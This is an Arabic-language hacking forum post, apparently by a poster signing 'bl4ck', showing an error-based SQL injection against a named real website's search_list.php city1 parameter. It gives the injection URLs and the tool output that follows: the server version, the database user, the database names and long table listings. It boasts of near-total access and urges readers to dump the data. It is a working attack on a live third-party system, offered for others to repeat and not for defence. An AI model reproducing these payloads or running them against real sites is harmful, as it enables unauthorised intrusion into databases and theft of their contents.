عدد النقاط : 10
كود: http://buy.house.msn.com.tw/search_list.php?city1=' Start exploiting... bl4ck MSSQL Running... كود: http://buy.house.msn.com.tw/search_list.php?city1='+or+1=convert(int,(SELECT @@version))-- اقتباس [+] @@VERSION: Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) اقتباس [+] USER: dbo [+] DB_NAME(): Egoupload [+] HOST_NAME(): ubuntu-home [+] Displaying list of all databases on MSSQL host! اقتباس [0] Egoupload [1] master [2] tempdb [3] model [4] msdb [5] pubs [6] Northwind [7] Egoupload ================================================== ============================= [+] Displaying tables inside DB: Egoupload اقتباس [0] dtproperties [1] foofoofoo [2] HSARS [3] HSBSMG [4] Land_administrator [5] MSreplication_subscriptions [6] MSsubscription_agents [7] POINDENT [8] PSDEPT [9] PSMAN [10] PSPERSON1 [11] syscommand [12] sysconstraints [13] syssegments [14] t [15] t_t [16] TOP100 [17] tt [18] ttt [19] ĄŻÂÚŞŕ«Ă¬Ý [20] ęe»▓ŽĘąŠŞŕ«Ă¬Ý [21] ęe»▓¬źąˇŞŕ«Ă¬Ý [22] ęeŻŠŽĘąŠŞŕ«Ă¬Ý [23] ęeŻŠŽĘąŠŞŕ«Ă¬Ý_TOP100 [24] ęeŻŠ¬źąˇŞŕ«Ă¬Ý [25] Şŕ«Ă_Ąj▒M░|«Ň [26] Şŕ«Ă_¬źąˇą╬│~ [27] Şŕ«Ă_¬źąˇ├■žO [28] Şŕ«Ă_░¬ĄĄ [29] Şŕ«Ă_░¬┼K [30] Şŕ«Ă_░ŕĄp [31] Şŕ«Ă_░॥ [32] Şŕ«Ă_▒Â╣B [33] Şŕ«Ă_Âm┬Ýąź░¤ [34] Şŕ«Ă_╣DŞ˘ [35] ║ŰÁěą═Čí░ÚŞŕ«Ă¬Ý [+] Displaying tables inside DB: Northwind اقتباس [0] Alphabetical list of products [1] Categories [2] Category Sales for 1997 [3] Current Product List [4] Customer and Suppliers by City [5] CustomerCustomerDemo [6] CustomerDemographics [7] Customers [8] dtproperties [9] Employees [10] EmployeeTerritories [11] Invoices [12] MSreplication_subscriptions [13] MSsubscription_agents [14] Order Details [15] Order Details Extended [16] Order Subtotals [17] Orders [18] Orders Qry [19] Product Sales for 1997 [20] Products [21] Products Above Average Price [22] Products by Category [23] Quarterly Orders [24] Region [25] Sales by Category [26] Sales Totals by Amount [27] Shippers [28] Summary of Sales by Quarter [29] Summary of Sales by Year [30] Suppliers [31] sysconstraints [32] syssegments [33] Territories [34] ęe»▓¬źąˇŞŕ«Ă¬Ý if you would you can get all db;) and database;) you only need good command;) I don't need this... so I share this :D Have a fun boys ;D المصدر: :: vBspiders Professional Network ::Access (99%) to msn>com>tw Lby bl4ck(;
http://buy.house.msn.com.tw/search_list.php?city1='
http://buy.house.msn.com.tw/search_list.php?city1='+or+1=convert(int,(SELECT @@version))--
Access (99%) to msn>com>tw Lby bl4ck(;
--< bl4ck >--